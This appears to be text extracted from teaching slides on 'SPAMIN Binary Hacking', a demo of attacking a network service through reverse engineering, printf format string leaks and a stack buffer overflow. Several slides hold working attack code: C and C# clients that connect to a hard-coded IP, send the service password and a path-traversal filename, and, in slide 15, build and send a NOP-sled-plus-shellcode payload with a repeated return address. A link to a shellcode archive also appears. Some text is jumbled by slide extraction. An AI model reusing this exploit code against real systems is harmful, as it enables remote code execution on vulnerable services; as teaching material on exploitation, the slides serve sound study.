1. SPAMIN Binary Hacking

2. Tools IDA + Hex Rays hexeditor WinSCP Putty telnet Visual Studio Wireshark (Optional)

5. Do not pirate http://www.hex- rays.com/idapro/hallofshame.html

6. Begin Demo SSH into and browse service netstat –anp telnet observe attempt exploit – optional reverse engineer exploit more patch

7. printf format string attack int printf(const char *format,...); printf(“%s”, str1); printf(“%s, %x, %x, %x”, str1, x, y, z); 3 “%x %x %x” 1 2 printf(“%x %x %x”,1,2,3); gets(str1); printf(str1); %n The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted

8. C# TcpClient client = new TcpClient("128.198.60.73", 8008); StreamWriter streamWriter = new StreamWriter(client.GetStream()); streamWriter.Write("SPAM-IN-SPAM-OUT\n"); streamWriter.Write("../public_html/fun.php \n"); streamWriter.Write(" \n"); streamWriter.Flush();

9. format file contents filename 512512 512512 512512 0x2000x200 0x2000x200 0x2000x200 0x62C0x62C 0xbffff178 … 0xbfffffff stuff

10. Gets Shell Code http://www.linux- secure.com/endymion/shellcodes/archive/linux -x86-mkdir1.c http://www.linux- secure.com/endymion/shellcodes/archive/linux -x86-mkdir1.c NOP Shell Code RA bufferbuffer

11. #include int sock; /* Socket descriptor */ struct sockaddr_in mySockAddr; /* server address */ WSADATA wsaData; /* Structure for WinSock setup communication */ if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */ { fprintf(stderr, "WSAStartup() failed"); exit(1); } sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&mySockAddr, 0, sizeof(mySockAddr)); mySockAddr.sin_family = AF_INET; mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73"); mySockAddr.sin_port = htons(8008); connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr)); send(sock,pass,17,0);

12. C# != C

13. unsigned __int8 isStringLess; // cf@1 unsigned __int8 isStringEqual; // zf@1 signed int v4; // ecx@1 int spamString2; // edi@1 char *userInput1; // esi@1 int result; // eax@6 char v8; // [sp-10h] [bp-648h]@1 char v9; // [sp+0h] [bp-638h]@1 char *v10; // [sp+Ch] [bp-62Ch]@16 int v11; // [sp+10h] [bp-628h]@1 int spamString1; // [sp+14h] [bp-624h]@1 char *v13; // [sp+18h] [bp-620h]@1 __int16 v14; // [sp+1Ch] [bp-61Ch]@1 char format; // [sp+28h] [bp-610h]@1 char filedata; // [sp+228h] [bp-410h]@12 char filename; // [sp+428h] [bp-210h]@9 int v18; // [sp+628h] [bp-10h]@1 FILE *stream; // [sp+62Ch] [bp-Ch]@1 format file contents filename Other Local Function Variable 512512 512512 512512 0x2000x200 0x2000x200 0x2000x200 0x62C0x62C Save Register (Prologue) ebp RA 3 Save Register (Prologue) ebp Save Registers 0xbffffb10 744744 … 0xbfffffff printf parameters RA process messageprocess message mainmain nop shellcode RA (repeated) printfprintf “%x %x %x” 1 2 printf(“%x %x %x”,1,2,3);

14. C# attack fork -- remote gdbserver gdb./spamin PID x /1000w 0xbfffffff – use offset found in printf attack gdbserver demo

15. int sock; /* Socket descriptor */ struct sockaddr_in mySockAddr; /* Echo server address */ char *pass = "SPAM-IN-SPAM-OUT\n"; char payload [2500]; WSADATA wsaData; /* Structure for WinSock setup communication */ if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */ { fprintf(stderr, "WSAStartup() failed"); exit(1); } sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&mySockAddr, 0, sizeof(mySockAddr)); mySockAddr.sin_family = AF_INET; mySockAddr.sin_addr.s_addr = inet_addr("128.198.60.73"); mySockAddr.sin_port = htons(8008); connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr)); int nopLength = 300; int length = 700; memset(payload, '\x90', nopLength); // Create the nop sled in the payload memcpy(&payload[nopLength],sc,sizeof(sc)); // Copy the shellcode into payload for (int j=0; j < 1500; j+= 4) // Copy the RA into the payload { int r = nopLength + sizeof(sc) -1; memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4); } payload[length-1] = '\n'; send(sock,pass,17,0); send(sock, payload, length, 0); send(sock,pass,17,0);